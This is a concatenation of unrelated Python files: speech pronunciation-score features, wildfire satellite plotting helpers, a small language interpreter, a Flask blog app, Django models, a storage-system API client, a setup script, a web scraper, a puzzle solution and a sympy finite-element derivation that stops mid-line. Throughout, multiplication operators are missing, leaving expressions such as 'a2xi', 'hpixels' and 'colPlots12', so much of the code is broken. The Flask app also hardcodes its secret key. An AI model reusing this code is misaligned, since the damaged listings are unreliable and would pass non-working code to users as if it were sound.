phn_idx += 1 if not vowel_gop: vowel_gop.append(1) if not consonants_gop: consonants_gop.append(1) if not syllable_gop: syllable_gop.append(1) return [min(vowel_gop), min(consonants_gop), min(syllable_gop), #minimum gops of vowel, consonant and syllable np.mean(vowel_gop), np.mean(consonants_gop), np.mean(syllable_gop), # average gop of vowels, consonants and syllables np.std(vowel_gop), np.std(consonants_gop), np.std(syllable_gop), # standard deviation of gops of vowels, consonants and syllables np.std(vowel_gop) / np.mean(vowel_gop), np.std(consonants_gop) / np.mean(consonants_gop), np.std(syllable_gop) / np.mean(syllable_gop), # standard deviation normalized by average ], ["gop_minV","gop_minC","gop_minSyl", "gop_avgV", "gop_avgC", "gop_avgSyl", "gop_stdV", "gop_stdC", "gop_stdSyl", "gop_VacroV", "gop_VacroC", "gop_VacroSyl", ] def gop_feat_simple(gop_vals, textgrid_file): """ Calculate gop statistics on vowels, consonants and syllables :param gop_vals: gop values of one utterance extracted from gop files :param textgrid_file: textgrid file :return: """ textgrid = TextGrid() textgrid.read(textgrid_file) phn_seq = "" for intervals in textgrid.tiers[1]: if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': phn_seq += " " + intervals.mark language = syllabifier.English syllables = syllabifier.syllabify(language, str(phn_seq)) vowel_gop, consonants_gop, syllable_gop = [], [], [] syllable_idx = 0 # determine which syllable current phoneme is in phn_idx = 0 syllable_phn_gop = [] for intervals in textgrid.tiers[1]: # vowels and consonants if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in vowels: vowel_gop.append(gop_vals[phn_idx]) elif intervals.mark in consonants: consonants_gop.append(gop_vals[phn_idx]) else: continue # syllables if syllable_idx < len(syllables): current_syllable = syllables[syllable_idx][1] + syllables[syllable_idx][2] + syllables[syllable_idx][3] if intervals.mark is not None: if intervals.mark != 'SIL' and intervals.mark != 'SPN': if intervals.mark in current_syllable: syllable_phn_gop.append(gop_vals[phn_idx]) if intervals.mark == current_syllable[-1]: syllable_idx += 1 syllable_gop.append(np.mean(syllable_phn_gop)) syllable_phn_gop = [] if intervals.mark is not None: phn_idx += 1 if not vowel_gop: vowel_gop.append(1) if not consonants_gop: consonants_gop.append(1) if not syllable_gop: syllable_gop.append(1) return [np.mean(vowel_gop), np.mean(consonants_gop), np.mean(syllable_gop)], ["gop_avgV", "gop_avgC", "gop_avgSyl"] def getUttLength(textgrid_file): textgrid = TextGrid() textgrid.read(textgrid_file) return textgrid.maxTime def processDirectories(gopFiles, alignmentdirectories, outputfile): output = open(outputfile, "a") uttlengthfile = open(outputfile.strip(".csv")+"_uttlength.csv", "a") alignDir = [] with open(alignmentdirectories, 'r') as f1: for line in f1: alignDir.append(line.strip('\n')) counter = 0 with open(gopFiles, 'r') as f2: for line in f2: gopFile = line.strip('\n') with open(gopFile,'r') as gop_fid: for eachline in gop_fid: outline = "" uttid = eachline.split()[0] #uttid spkname = uttid.split('_')[0] gop_str = eachline.split()[2:-1] # gop values in string gop_vals = [float(item) for item in gop_str] # to float numebrs textgrid_file = alignDir[counter] + '/' + uttid + '.TextGrid' # path of TextGrid file corresponding to uttid feat, descript = gop_feat_simple(gop_vals, textgrid_file) for item in feat: if item != 1 and item != 0: outline = (outline + "," + str(item)) output.write(uttid + outline + "\n") length = getUttLength(textgrid_file) uttlengthfile.write(uttid + "," + str(length) + "\n") counter += 1 output.close() uttlengthfile.close() # test if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--gop_files', help='text file with all gop files') parser.add_argument('--align_dir', help='text file with directories for all alignment files are stored') parser.add_argument('--out_dir', help='output file') args = parser.parse_args() processDirectories(args.gop_files, args.align_dir, args.out_dir) print("Done!")
# -- coding: utf-8 -- """ Created on Thu Jan 25 09:14:14 2018 @author: JHodges """ import time import pickle import numpy as np import xml.etree.ElementTree as ET import matplotlib.pyplot as plt import scipy.interpolate as scpi from matplotlib.colors import LinearSegmentedColormap import imageio import glob import psutil def tic(): ''' This function returns the current time. ''' return time.time() def toc(tim): ''' This function prints the time since the input time and returns the current time. ''' tom = time.time() print("%.4f sec Elapsed"%(tom-tim)) return tom def dumpPickle(data,filename): ''' This function will dump data to filename for future reuse. ''' with open(filename,'wb') as f: pickle.dump(data,f) def readPickle(filename): ''' This function will read data from filename and return it ''' with open(filename,'rb') as f: data = pickle.load(f) return data def mapTileGrid(tiles,pixels,coordFromNameFnc): ''' This function will create a larger matrix which encompasses multiple MODIS Level 3 tiles. Returns a dictionary with key = tile name and value = grid coordinates in larger matrix and the larger grid. ''' h_min = 361 h_max = -361 v_min = 361 v_max = -361 tiles_grid_dict = dict() for tile in tiles: v_tile,h_tile = coordFromNameFnc(tile) tiles_grid_dict[tile] = [h_tile,v_tile] h_min = int(h_tile) if h_tile < h_min else h_min h_max = int(h_tile) if h_tile > h_max else h_max v_min = int(v_tile) if v_tile < v_min else v_min v_max = int(v_tile) if v_tile > v_max else v_max for key in tiles_grid_dict: tiles_grid_dict[key] = list(np.array(tiles_grid_dict[key])-np.array([h_min,v_min])) tiles_grid = np.zeros((pixels(v_max-v_min+1),pixels(h_max-h_min+1)),dtype=np.float32) return tiles_grid_dict, tiles_grid def fillTileGrid(tile_grid,tile_grid_dict,tile,data,pixels): ''' This function will fill measurements associated with a single MODIS Level 3 tile into a previously generated larger tile grid encompassing multiple tiles. ''' h,v = tile_grid_dict[tile] start_h = (hpixels) end_h = ((h+1)pixels) start_v = (vpixels) end_v = ((v+1)pixels) (start_h,end_h,start_v,end_v) = (int(start_h),int(end_h),int(start_v),int(end_v)) tile_grid[start_v:end_v,start_h:end_h] = data.copy() return tile_grid def getStateBoundaries(state='California',filename='../data-sample/states.xml'): ''' This function will load the latitude/longitude boundaries of USA states from an xml file. the xml file used here was taken from: http://econym.org.uk/gmap/states.xml ''' if state == 'All': all_states = True all_pts = dict() else: all_states = False tree = ET.parse(filename) root = tree.getroot() for actor in root.findall('state'): if actor.attrib['name'] == state or all_states: pts = [] for point in actor.findall('point'): pts.append([float(point.attrib['lat']),float(point.attrib['lng'])]) pts = np.array(pts,dtype=np.float32) if all_states: state_name = actor.attrib['name'] all_pts[state_name] = pts if all_states: return all_pts else: return pts def plotContourWithStates(lat,lon,data, states=None,clim=None,xlim=None,ylim=None, saveFig=False,saveName='', label='',cmap='jet'): ''' This function will plot a contour map using latitude, longitude, and data matricies. State boundary lines will be overlaid on the contour. If a list of matrices are passed instead, each contour in the list will be plotted. ''' if states is None: states = getStateBoundaries(state='California') elif type(states) is str: states=getStateBoundaries(state=states) if cmap == 'satComp': colors = [(1, 1, 1), (0, 0, 1), (1, 0, 0)] cmap = LinearSegmentedColormap.from_list('satComp', colors, N=3) if saveFig: fntsize = 80 lnwidth = 10 fig = plt.figure(figsize=(48,38),tight_layout=True) #fig = plt.figure(figsize=(12,8),tight_layout=True) else: fig = plt.figure(figsize=(12,8),tight_layout=True) fntsize = 20 lnwidth = 2 ax1 = fig.add_subplot(1,1,1) if type(data) is list: for i in range(0,len(data)): da = data[i] la = lat[i] lo = lon[i] if clim is None: ax1.contourf(lo,la,da,cmap=cmap) else: ax1.contourf(lo,la,da,clim,cmap=cmap) else: if clim is None: img = ax1.contourf(lon,lat,data,cmap=cmap) else: img = ax1.contourf(lon,lat,data,clim,cmap=cmap) if clim is None: img_cb = fig.colorbar(img,label=label) else: img_cb = fig.colorbar(img,label=label,ticks=clim) img_cb.set_label(label=label,fontsize=fntsize) plt.xlabel('Longitude',fontsize=fntsize) plt.ylabel('Latitude',fontsize=fntsize) if type(states) is dict: for state in states: ax1.plot(states[state][:,1],states[state][:,0],'-k') if xlim is None: xlim = [-125,-66] if ylim is None: ylim = [24,50] else: #ax1.plot(states[:,1],states[:,0],'-k') if xlim is None: xlim = [-125,-113] if ylim is None: ylim = [32,43] plt.xlim(xlim) plt.ylim(ylim) if saveFig: img_cb.ax.tick_params(axis='both',labelsize=fntsize) ax1.tick_params(axis='both',labelsize=fntsize) ax1.grid(linewidth=lnwidth/4,linestyle='-.',color='k') for ln in ax1.lines: ln.set_linewidth(lnwidth) fig.savefig(saveName) plt.clf() plt.close(fig) print(saveName) return fig def daysInYear(year): ''' daysInYear: This function will return the number of days in a year by determining if the year number is a leap year. ''' if (year % 4) == 0: if (year % 100) == 0: if (year % 400) == 0: days = 366 else: days = 365 else: days = 366 else: days = 365 return days def fillEmptyCoordinatesRectilinear(data): ''' This function will fill empty values in a rectilinear grid with only the corners defined. ''' [r,c] = data.shape dataNan = data.copy() dataNan[data == 0] = np.nan r0mn = np.nanmin(dataNan[0,:]) r0mx = np.nanmax(dataNan[0,:]) c0mn = np.nanmin(dataNan[:,0]) c0mx = np.nanmax(dataNan[:,0]) #print(r0mn,r0mx,c0mn,c0mx) if abs(c0mx-c0mn) > 0 and abs(r0mx-r0mn) > 0: assert False, "Both column and row values are changing." elif abs(r0mx-r0mn) == 0: for i in range(0,r): rowValue = np.nanmax(dataNan[i,:]) dataNan[i,:] = rowValue.copy() elif abs(c0mx-c0mn) == 0: for i in range(0,c): colValue = np.nanmax(dataNan[:,i]) dataNan[:,i] = colValue.copy() else: assert False, "Did not find a valid region." return dataNan def makeGIF(indir,outfile,ext='.png',fps=None): ''' This function will take all files with extension ext from an input director indir and create a video file named outfile. NOTE: If outfile ends in (.gif) the file will be a gif, if it ends in (.mp4) the file will be an mp4. NOTE: (.mp4) is preferred to reduce file size. NOTE: Specifying a custom fps with (.mp4) will cause issues in some media players. ''' if indir[-1] == '/': files = glob.glob(indir+''+ext) else: files = glob.glob(indir+'/'+ext) if len(files) > 0: if fps is None: writer = imageio.get_writer(outfile) else: writer = imageio.get_writer(outfile,fps=fps) for file in files: mem = psutil.virtual_memory()[2] if mem < 90.0: print(file) writer.append_data(imageio.imread(file)) else: print("Memory full.") writer.close() def findTensorflowGPUs(): from tensorflow.python.client import device_lib local_device_protos = device_lib.list_local_devices() return [x.name for x in local_device_protos if x.device_type == 'GPU'] def plotImageList(datas,names, clims=None,closeFig=None, saveFig=False,saveName=''): totalPlots = np.ceil(float(len(datas))*0.5) colPlots = totalPlots rowPlots = np.ceil((float(len(datas)))/colPlots) currentPlot = 0 if saveFig: fntsize = 20 lnwidth = 5 fig = plt.figure(figsize=(colPlots12,rowPlots10))#,tight_layout=True) if closeFig is None: closeFig = True else: fig = plt.figure(figsize=(colPlots6,rowPlots5))#,tight_layout=True) fntsize = 20 lnwidth = 2 if closeFig is None: closeFig = False xmin = 0 xmax = datas[0].shape[1] xticks = np.linspace(xmin,xmax,int(round((xmax-xmin)/10)+1)) ymin = 0 ymax = datas[0].shape[0] yticks = np.linspace(ymin,ymax,int(round((ymax-ymin)/10)+1)) for i in range(0,len(names)): key = names[i] currentPlot = currentPlot+1 ax = fig.add_subplot(rowPlots,colPlots,currentPlot) ax.tick_params(axis='both',labelsize=fntsize) plt.xticks(xticks) plt.yticks(yticks) #plt.xlabel('Longitude',fontsize=fntsize) #plt.ylabel('Latitude',fontsize=fntsize) plt.title(key,fontsize=fntsize) if clims is None: clim = np.linspace(0,1,10) label = '' else: clim = clims[i] label = '' img = ax.imshow(datas[i],cmap='jet',vmin=clim[0],vmax=clim[-1])#,vmin=0,vmax=1) #img = ax.contourf(self.longitude,self.latitude,getattr(self,key),levels=clim,cmap=cmap) img_cb = plt.colorbar(img,ax=ax,label=label) img_cb.set_label(label=label,fontsize=fntsize) img_cb.ax.tick_params(axis='both',labelsize=fntsize) ax.grid(linewidth=lnwidth/4,linestyle='-.',color='k') for ln in ax.lines: ln.set_linewidth(lnwidth) if saveFig: fig.savefig(saveName) if closeFig: plt.clf() plt.close(fig) def plotGriddedList(datas, saveFig=False, closeFig=None, saveName='', clim=None, cmap='jet', label='None'): ''' This function will plot the gridded measurement pair ''' inNum, outNum = datas.countData() inNames, outNames = datas.getDataNames() inTime, outTime = datas.strTime() totalPlots = np.ceil((float(inNum)+float(outNum))0.5) colPlots = totalPlots rowPlots = np.ceil((float(inNum)+float(outNum))/colPlots) currentPlot = 0 if saveFig: fntsize = 40 lnwidth = 10 fig = plt.figure(figsize=(colPlots24,rowPlots20))#,tight_layout=True) if closeFig is None: closeFig = True else: fig = plt.figure(figsize=(colPlots6,rowPlots*5))#,tight_layout=True) fntsize = 20 lnwidth = 2 if closeFig is None: closeFig = False xmin = np.round(np.min(datas.longitude),1) xmax = np.round(np.max(datas.longitude),1) xticks = np.linspace(xmin,xmax,int(round((xmax-xmin)/0.1)+1)) ymin = np.round(np.min(datas.latitude),1) ymax = np.round(np.max(datas.latitude),1) yticks = np.linspace(ymin,ymax,int(round((ymax-ymin)/0.1)+1)) names = inNames+outNames for i in range(0,len(names)): key = names[i] currentPlot = currentPlot+1 ax = fig.add_subplot(rowPlots,colPlots,currentPlot) ax.tick_params(axis='both',labelsize=fntsize) plt.xticks(xticks) plt.yticks(yticks) plt.xlabel('Longitude',fontsize=fntsize) plt.ylabel('Latitude',fontsize=fntsize) plt.title(key,fontsize=fntsize) print(clim) if clim is None: if 'FireMask' in key: clim2 = np.linspace(0,9,10) label = 'AF' elif 'Elevation' in key: clim2 = np.linspace(-1000,5000,7) label = 'Elev [m]' elif 'WindX' in key: clim2 = np.linspace(-6,6,13) label = 'u [m/s]' elif 'WindY' in key: clim2 = np.linspace(-6,6,13) label = 'v [m/s]' elif 'VegetationIndex' in key: clim2 = np.linspace(-4000,10000,8) label = 'NVDIx1000' elif 'Canopy' in key: clim2 = np.linspace(0,100,11) label = 'Canopy' else: clim2 = np.linspace(0,9,10) else: label = '' clim2 = clim img = ax.contourf(datas.longitude,datas.latitude,getattr(datas,key),levels=clim2,cmap=cmap) img_cb = plt.colorbar(img,ax=ax,label=label) img_cb.set_label(label=label,fontsize=fntsize) img_cb.ax.tick_params(axis='both',labelsize=fntsize) ax.grid(linewidth=lnwidth/4,linestyle='-.',color='k') for ln in ax.lines: ln.set_linewidth(lnwidth) if saveFig: fig.savefig(saveName) if closeFig: plt.clf() plt.close(fig) if __name__ == "__main__": devices = findTensorflowGPUs() print(devices)
#!/bin/python3 from lexer import lexer_qsl from parserqsl import parser_qsl from process.link import link from process.types import types from process.execute import execute from process.load import load from process.print import printkb from process.slink import slink import argparse p = argparse.ArgumentParser(prog='main.py', description="QSL Interpreter") p.add_argument('program', nargs="?", help="path of the program to interpret") p.add_argument('-t', '--tokens', action="store_true", help="Display the list of tokens instead of executing the program") args = p.parse_args() lqsl = lexer_qsl().build() parser = parser_qsl().build(lexer_qsl()) tv = {} vload = load(parser) vlink = link(tv) slin = slink() vtype = types() vexp = execute() vprint = printkb() if (args.program is None): while True: try: s = input('QSL> ') except EOFError: break if not s: continue lqsl.input(s) if args.tokens: # Tokenize while True: tok = lqsl.token() if not tok: break # No more input print(tok) ast = parser.parse(s, lexer=lqsl) ast.visit(vload) ast.visit(vlink) ast.visit(slin) ast.visit(vtype) ast.visit(vexp) else: with open(args.program) as f: data = f.read() lqsl.input(data) if args.tokens: while True: tok = lqsl.token() if not tok: break # No more input print(tok) ast = parser.parse(data, lexer=lqsl) for line in ast.lines: line.visit(vload) line.visit(vlink) line.visit(slin) line.visit(vtype) result = line.visit(vexp) line.visit(vprint)
"""Blogly application.""" from flask import Flask, request, redirect, render_template, url_for from models import db, connect_db, User, Post, Tag, PostTag from flask_debugtoolbar import DebugToolbarExtension app = Flask(__name__) app.config["SECRET_KEY"] = "SECRET_GARFIELD" app.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False app.config['SQLALCHEMY_ECHO'] = True toolbar = DebugToolbarExtension(app) connect_db(app) db.create_all() @app.route('/') def root(): """Homepage redirects to list of users.""" return redirect("/users") ################################################## # User route @app.route('/users') def index(): """Routing for Users list """ users = User.query.all() return render_template("index.html", users=users) @app.route('/users/create', methods=["GET", "POST"]) def create_user(): """Routing for creating a user """ if request.method == "POST": # Grabs all the form values first_name = request.form['first-name'] last_name = request.form['last-name'] img_url = request.form['img-url'] img_url = img_url if img_url else None # Creates a user instance user = User(first_name=first_name, last_name=last_name, img_url=img_url) db.session.add(user) db.session.commit() return redirect('/users') return render_template('create-user.html') @app.route('/users/user/<int:id>') def user(id): """Routing for viewing a user """ user = User.query.get(id) posts = Post.query.filter(Post.user_id == id).all() return render_template('user.html', user=user, posts=posts) @app.route('/users/user/<int:id>/delete') def delete(id): """Routing for deleting a user """ user = User.query.get(id) db.session.delete(user) db.session.commit() return redirect("/users") @app.route('/users/user/<int:id>/edit', methods=["POST", "GET"]) def edit(id): """Routing for editing a user""" user = User.query.get_or_404(id) if request.method == "POST": first_name = request.form['first-name'] last_name = request.form['last-name'] img_url = request.form['img-url'] img_url = img_url if img_url else None user.first_name = first_name user.last_name = last_name user.img_url = img_url db.session.commit() return redirect('/users') return render_template("edit.html", user=user) # `` # Posting stuff @app.route('/users/user/<int:id>/posts/new', methods=["POST", "GET"]) def new_post(id): """Route for making a new post""" if request.method == "POST": # Grab form info from html title = request.form['post-title'] content = request.form['post-content'] # converts all the tags into ints tag_ids = request.form.getlist("tags") # Creates a post post = Post(title=title, content=content, user_id=id) # Grab all the tags for tag_id in tag_ids: post.tags.append(Tag.query.get(int(tag_id))) db.session.commit() return redirect(f'/users/user/{id}') # Send all the tags tags = Tag.query.all() return render_template("create-post.html", id=id, tags=tags) @app.route('/posts/<int:post_id>') def post(post_id): """Views the post""" post = Post.query.get(post_id) return render_template("post.html", post=post) @app.route('/posts/<int:post_id>/edit') def show_edit_post_form(post_id): """Shows the form to edit a post """ post = Post.query.get(post_id) tags = Tag.query.all() return render_template('edit-post.html', post=post, tags=tags) @app.route('/posts/<int:post_id>/edit', methods=["POST"]) def post_edit(post_id): """Shows the form to edit a post """ # Grab the modified changes title = request.form['post-title'] content = request.form['post-content'] list_tags = request.form.getlist("tags") # Modify the post post = Post.query.get(post_id) post.title = title post.content = content # Grab the Tag using the id from list_tags post.tags = [Tag.query.get(int(tag)) for tag in list_tags] db.session.commit() return redirect(f'/posts/{post_id}') @app.route('/posts/<int:post_id>/delete') def delete_post(post_id): """Deletes a post given the id """ post = Post.query.get(post_id) db.session.delete(post) db.session.commit() return redirect("/users") ################################################## # Tag stuff @app.route('/tags') def show_tags(): tags = Tag.query.all() return render_template('tags.html', tags=tags) @app.route('/tags', methods=["POST"]) def create_tag(): tag = request.form["tag-name"] new_tag = Tag(name=tag) db.session.add(new_tag) db.session.commit() return redirect('/tags') @app.route('/tags/create-tag') def create_tag_form(): return render_template('create-tag.html') @app.route('/tags/<int:tag_id>') def show_single_tag(tag_id): """Shows information about a tag """ tag = Tag.query.get(tag_id) print(tag.posts) return render_template('tag-info.html', tag=tag) @app.route('/tags/<int:tag_id>/edit') def edit_tag_form(tag_id): """ Shows the edit form """ tag = Tag.query.get(tag_id) return render_template('tag-edit.html', tag=tag) @app.route('/tags/<int:tag_id>/edit', methods=["POST"]) def edit_tag(tag_id): """ Handles the edit submission""" print("Look here:, we've received a post request to edit", ) tag = Tag.query.get(tag_id) # Grab the form info new_tag_name = request.form["tag-name"] # Edit tag.name = new_tag_name db.session.commit() return redirect(f'/tags/{tag_id}') @app.route('/tags/<int:tag_id>/delete') def delete_tag(tag_id): """Deletes a tag_id given the id """ tag = Tag.query.get(tag_id) db.session.delete(tag) db.session.commit() return redirect("/users") ################################################## # Refactoring # It is better to separate get/post methods, because it is easier to understand # Delete a tag has some bug - cascading # Post.query(column names)...join... # You are going to get tuple values instead of instances.
from django.db import models class Material(models.Model): name = models.CharField(max_length=50, unique=True) def __str__(self): return self.name class Meta: db_table='material' class Rock(models.Model): name = models.CharField(max_length=50, unique=True) description = models.TextField(null=True) picture = models.ImageField(upload_to="media/", null=True) added_time = models.DateTimeField(auto_now_add=True, null=True) materials = models.ManyToManyField(Material, through='RockComposition') def __str__(self): return self.name class Meta: db_table='rock' default_permissions = ('view', 'add', 'change', 'delete' ) def description_short(self): return self.description[:300] class RockComposition(models.Model): rock = models.ForeignKey(Rock, db_column='rock_id', on_delete=models.CASCADE) material = models.ForeignKey(Material, db_column='material_id', on_delete=models.PROTECT) class Meta: db_table='rock_composition' # class RockComposition(models.Model): # rock_id = models.ForeignKey(Rock, on_delete = models.CASCADE) # material_id = models.ForeignKey(Material, on_delete = models.PROTECT) # # class Meta: # db_table='rock_composition' # hunter = models.ForeignKey(User, on_delete=models.CASCADE)
# Copyright (c) 2020 Dell Inc. or its subsidiaries. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging import requests from PyPowerFlex import base_client from PyPowerFlex import exceptions LOG = logging.getLogger(__name__) class FaultSet(base_client.EntityRequest): def clear(self, fault_set_id): """Clear PowerFlex fault set. :type fault_set_id: str :rtype: dict """ action = 'clearFaultSet' r, response = self.send_post_request(self.base_action_url, action=action, entity=self.entity, entity_id=fault_set_id) if r.status_code != requests.codes.ok: msg = ('Failed to clear PowerFlex {entity} ' 'with id {_id}. Error: {response}' .format(entity=self.entity, _id=fault_set_id, response=response)) LOG.error(msg) raise exceptions.PowerFlexClientException(msg) return self.get(entity_id=fault_set_id) def create(self, protection_domain_id, name=None): """Create PowerFlex fault set. :type protection_domain_id: str :type name: str :rtype: dict """ params = dict( protectionDomainId=protection_domain_id, name=name ) return self._create_entity(params) def get_sdss(self, fault_set_id, filter_fields=None, fields=None): """Get related PowerFlex SDSs for fault set. :type fault_set_id: str :type filter_fields: dict :type fields: list\|tuple :rtype: list[dict] """ return self.get_related(fault_set_id, 'Sds', filter_fields, fields) def delete(self, fault_set_id): """Remove PowerFlex fault set. :type fault_set_id: str :rtype: None """ return self._delete_entity(fault_set_id) def rename(self, fault_set_id, name): """Rename PowerFlex fault set. :type fault_set_id: str :type name: str :rtype: dict """ action = 'setFaultSetName' params = dict( newName=name ) return self._rename_entity(action, fault_set_id, params)
import os from setuptools import setup, Command, find_packages def readme(): with open('README.rst') as f: return f.read() class CleanCommand(Command): """Custom clean command to tidy up the project root.""" user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): os.system('rm -vrf build dist .pyc .tgz *.egg-info') setup(name = 'optlo_calc', version = '0.1', description = '''Code for Calculating Optical Loading or Transmission through microwave optical chains''', long_description = readme(), author = 'Katie Harrington', author_email = 'katie.megan.harrington@gmail.com', license = 'MIT', packages = ['optlo_calc', 'optlo_calc.optics'], package_dir = {'optlo_calc':'python'}, cmdclass={'clean':CleanCommand,}, #scripts = [] )
import requests from bs4 import BeautifulSoup as bs url2 = "https://artsandculture.google.com/asset/anne-in-a-striped-dress-fairfield-porter/TAHUTWNOPxdkYA" req2 = requests.get(url2) soup2 = bs(req2.text, "lxml") im = "https:" + soup2.find_all("img", class_="pmK5Xc")[0]["src"] # img_link td1 = soup2.find("section", class_="rw8Th QwmCXd") td3 = td1.find_all("li") # print(td3) d3 = {} for i in range(len(td3)): if "Title" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Title"] = k if "Creator" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Creator"] = k if "Location" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Location"] = k if "Medium" in td3[i].find_all("span")[0].text: ind = td3[i].text.index(": ") k = td3[i].text[ind + 1 :][1:] d3["Medium"] = k if "External Link" in td3[i].find_all("span")[0].text: a = td3[i].find_all("a") d3["External Link"] = a[0]["href"] print(d3) # d3['Date created']=td3[2].contents[1] # d3['Location']=td3[3].contents[1] # d3['Medium']=td3[7].find_all('a')[0].text f7 = open("/Users/Lasitha/Documents/art_tweets/scraped_data/current_tweet.txt", "w+") for i in d3: f7.write(i + ":" + d3[i] + "\n") f7.close() response = requests.get(im) if response.status_code == 200: with open( "/Users/Lasitha/Documents/art_tweets/scraped_data/imgs/current.jpg", "wb" ) as f: f.write(response.content) print(d3)
import os def main(): os.chdir(os.path.dirname(os.path.abspath(__file__))) input = open("day15_input.txt").read().splitlines() print(solve(input)) class Generator: def __init__(self, starting_value, factor, multiple=1): self.previous_value = starting_value self.factor = factor self.multiple = multiple def generate(self): self.previous_value = (self.previous_value * self.factor) % 2147483647 if self.previous_value % self.multiple == 0: return self.previous_value else: return self.generate() def to_binary(value): # 0xFFFF = '0b1111111111111111' if we do a bitwise '&' # that matches the first 16 bits of the value thus selecting # them. return value & 0xFFFF def solve(input): gen_a = Generator(int(input[0].split()[-1]), 16807) gen_b = Generator(int(input[1].split()[-1]), 48271) matches = 0 for i in range(40000000): if to_binary(gen_a.generate()) == to_binary(gen_b.generate()): matches += 1 return matches if __name__ == '__main__': main()
# -- coding: utf-8 -- """ Created on Fri Jun 16 10:26:16 2017 @author: Peter Wilson """ import numpy as np import sympy as sp print("sympy version: ",sp.__version__) from mpl_toolkits.mplot3d import Axes3D from matplotlib.colors import Normalize import matplotlib.pyplot as plt from matplotlib import cm from matplotlib.ticker import LinearLocator, FormatStrFormatter myfontsize = 20 labelfontsize = 14 #=============================================================================== ## Set style of plots font = {'family' : 'sans-serif', 'family' : 'Arial', 'style' : 'normal', 'weight' : 'normal', 'size' : labelfontsize} plt.rc('font', *font) plt.rc('font', serif='Helvetica Neue') #plt.rcParams['font.family'] = 'Arial' #plt.ticklabel_format(style='sci', axis='y', scilimits=(1e-4,10000)) #=============================================================================== xi = sp.Symbol('xi') eta = sp.Symbol('eta') loc1 = sp.Symbol('loc1') loc2 = sp.Symbol('loc2') alpha = sp.Symbol('alpha') beta = sp.Symbol('beta') a1 = sp.Symbol('a1') a2 = sp.Symbol('a2') a3 = sp.Symbol('a3') a4 = sp.Symbol('a4') a5 = sp.Symbol('a5') a6 = sp.Symbol('a6') a7 = sp.Symbol('a7') a8 = sp.Symbol('a8') a9 = sp.Symbol('a9') Bub = sp.Symbol('Bub') W1 = sp.Symbol('W1') W2 = sp.Symbol('W2') W3 = sp.Symbol('W3') PX1 = sp.Symbol('PX1') PX2 = sp.Symbol('PX2') PX3 = sp.Symbol('PX3') PY1 = sp.Symbol('PY1') PY2 = sp.Symbol('PY2') PY3 = sp.Symbol('PY3') # THESE ARE KRATOS NODAL ROTATIONS - DEFINED RX1 = sp.Symbol('RX1') RX2 = sp.Symbol('RX2') RX3 = sp.Symbol('RX3') RY1 = sp.Symbol('RY1') RY2 = sp.Symbol('RY2') RY3 = sp.Symbol('RY3') a = sp.Symbol('a') #xi2 - xi1 b = sp.Symbol('b') #eta2 - eta1 c = sp.Symbol('c') #eta3 - eta1 d = sp.Symbol('d') #xi3 - xi1 detJ = sp.Symbol('detJ') #Nodal coords xi1 = sp.Symbol('xi1') eta1 = sp.Symbol('eta1') xi2 = sp.Symbol('xi2') eta2 = sp.Symbol('eta2') xi3 = sp.Symbol('xi3') eta3 = sp.Symbol('eta3') #Node coordinates set to example values xi1 = 0.0 eta1 = 0.0 xi2 = 1.0 eta2 = 0.0 xi3 = 0.0 eta3 = 1.0 #Shape functions N1 = (1.0-xi-eta) N2 = xi N3 = eta # ----------------------------------------------------------------------------- # Section 1 : Define diplacement fields # ----------------------------------------------------------------------------- kirchhoffDispField = a1 + a2xi +a3eta + a4xi*2 + 0.5(a5+a6)xieta + a7eta2 # original Bletzinger #rmDispField = a8xi + a9eta - Bubxieta #generic bubble mode # original Bletzinger #rmDispField = a8xi + a9eta - (a8+a9)xieta #generic bubble mode # original Bletzinger rmDispField = a8xi + a9eta #no bubble # original Bletzinger no bubbl field #rmDispField = N1W1 + xiW2 + etaW3 + a8xi + a9eta # modified by explicitly including displacements, this means the constants a8 and a9 are only rotations moderatorDispField = 0.5(a5-a6)N2N3 # original Bletzinger C = a5 - a6 # ----------------------------------------------------------------------------- # Section 2 : Introduce moderator field into the Kirchhoff and RM disp fields # ----------------------------------------------------------------------------- PX = kirchhoffDispField + moderatorDispField PY = kirchhoffDispField - moderatorDispField GX = rmDispField + moderatorDispField GY = rmDispField - moderatorDispField # ----------------------------------------------------------------------------- # Section 3 : Differentiate displacement fields to recover shear deformation fields # ----------------------------------------------------------------------------- kirchhoffShearField_xi = sp.diff(PX,xi) kirchhoffShearField_eta = sp.diff(PY,eta) rmShearField_xi = sp.diff(GX,xi) rmShearField_eta = sp.diff(GY,eta) # ----------------------------------------------------------------------------- # Section 4 : Setup equations # ----------------------------------------------------------------------------- # Alternative representation of the shear gap field shearGapField = rmDispField - kirchhoffDispField shearGapField_xi = GX - PX shearGapField_eta = GY - PY print("shearGapField = ",sp.simplify(shearGapField)) #Identification of the Ansatz coefficients with the node values for shifts Wi and rotations # (converted to zero value eqns) # Shear gaps at nodes should be zero eq1 = W1 - (shearGapField.subs(xi,xi1)).subs(eta,eta1) eq2 = W2 - (shearGapField.subs(xi,xi2)).subs(eta,eta2) #xi2, eta2 eq3 = W3 - (shearGapField.subs(xi,xi3)).subs(eta,eta3) #xi3, eta3 # Nodal shear deformations should be zero eq4 = PX1 - (kirchhoffShearField_xi.subs(xi,xi1)).subs(eta,eta1) eq5 = PX2 - (kirchhoffShearField_xi.subs(xi,xi2)).subs(eta,eta2) eq6 = PX3 - (kirchhoffShearField_xi.subs(xi,xi3)).subs(eta,eta3) eq7 = PY1 - (kirchhoffShearField_eta.subs(xi,xi1)).subs(eta,eta1) eq8 = PY2 - (kirchhoffShearField_eta.subs(xi,xi2)).subs(eta,eta2) eq9 = PY3 - 